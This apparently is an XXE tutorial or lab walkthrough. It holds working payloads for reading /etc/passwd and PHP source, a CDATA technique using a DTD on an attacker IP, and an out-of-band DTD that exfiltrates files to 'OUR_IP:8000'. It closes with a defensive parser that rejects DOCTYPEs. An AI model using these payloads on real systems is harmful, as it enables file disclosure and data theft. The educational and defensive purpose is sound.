# XML External Entity (XXE)

## Basic XXE Payloads

```xml
<!-- Simple file read -->
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

<!-- PHP filters -->
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>
```

## Basic XXE Testing

In the image below I can see that my email is reflected back to me, so I will test that parameter for XXE.

<figure><img src="/files/DeHjcqVKtrESVKWfpTxt" alt=""><figcaption></figcaption></figure>

Now I will test for basic XXE:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>
<name>test</name>
<tel>1122112211</tel>
<email>&test;</email>
<message>sadadasdasdasd</message>
</root>
```

<figure><img src="/files/ZidseW3oOFsRFWOAnApN" alt=""><figcaption></figcaption></figure>

## XXE PHP Filters to Read Source Code

We can now try to read source code using PHP filters; I will try to read the **connection.php** file.

```xml
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>
```

<figure><img src="/files/TCmZK1ATLRkY3Yc8eakg" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vwqbU96UhTLr1Msgcoir" alt=""><figcaption></figcaption></figure>

## Advanced File Disclosure (XXE CDATA)

If the web app is not built in PHP, then PHP filters cannot help us. Instead we can use CDATA to read any sort of file, including binary data, since content wrapped in a CDATA section is not parsed as XML markup.

<figure><img src="/files/p9R6SH7mML1cD1wHVJtU" alt=""><figcaption></figcaption></figure>

**This will not work**, because XML does not allow joining internal and external entities like this, so we need another way.

So I will host a DTD on my Python server.

<figure><img src="/files/0whQKB0RsUAQJdbZ58kk" alt=""><figcaption></figcaption></figure>

Now this will fetch the DTD from my Python server:

```xml
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///flag.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.15.163/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
```

<figure><img src="/files/jgwaig4nwaFVzYHCAPQi" alt=""><figcaption></figcaption></figure>

Now I can read the file as well.

## Blind XXE (Out of Band Data Exfiltration)

Sometimes the website does not return a response, so you need to exfiltrate the data out of band to your own Python server.

```xml
<!-- xxe.dtd, hosted on our server -->
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>
```

We need to host xxe.dtd on our Python server.

<figure><img src="/files/664zcVBBy8tLfaui3DST" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dpFAgLbwlW67E0WRzAaL" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/oz4wJwxlEQeurVHBmVWQ" alt=""><figcaption></figcaption></figure>
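Every payload on this page (the basic file read, the CDATA trick and the out-of-band DTD) depends on the server-side parser accepting a DOCTYPE. The following is an added defender-side example, not code from these notes: a stdlib `xml.parsers.expat` parser for the contact form above that aborts on any DOCTYPE before an entity can be declared, expanded or fetched. The sample documents are constructed from the page's form and payloads.

```python
import xml.parsers.expat as expat


class DtdForbidden(ValueError):
    """A DOCTYPE was found; every XXE payload on this page starts with one."""


def _forbid_doctype(name, sysid, pubid, has_internal_subset):
    # Fires before any <!ENTITY ...> inside the DTD is processed.
    raise DtdForbidden(f"DOCTYPE '{name}' rejected: DTDs are not accepted")


def parse_contact_form(doc):
    """Parse <root><name/><tel/><email/><message/></root> with DTDs disabled.

    Returns {element: text}. Any DOCTYPE (internal subset, external subset,
    general or parameter entities) aborts the parse.
    """
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _forbid_doctype
    # Belt and braces: never load an external DTD or parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields, stack = {}, []
    parser.StartElementHandler = lambda tag, attrs: stack.append(tag)
    parser.EndElementHandler = lambda tag: stack.pop()

    def on_text(data):
        if stack:  # collect text for the innermost open element
            fields[stack[-1]] = fields.get(stack[-1], "") + data

    parser.CharacterDataHandler = on_text
    parser.Parse(doc, True)
    return {tag: text.strip() for tag, text in fields.items() if tag != "root"}


def is_rejected(doc):
    """True if the hardened parser refuses the document."""
    try:
        parse_contact_form(doc)
    except DtdForbidden:
        return True
    return False


# Constructed samples: a benign submission and the page's file-read payload.
BENIGN = """<?xml version="1.0"?>
<root><name>test</name><tel>1122112211</tel>
<email>alice@example.com</email><message>hi</message></root>"""
XXE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root><name>test</name><tel>1122112211</tel>
<email>&test;</email><message>hi</message></root>"""
# Parameter-entity variant (the CDATA and out-of-band DTDs) is rejected the same way.
XXE_PARAM = """<?xml version="1.0"?>
<!DOCTYPE email [ <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd"> %remote; ]>
<root>&content;</root>"""
```

Rejecting the DOCTYPE outright also stops internal-entity expansion attacks that need no network or file access at all.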

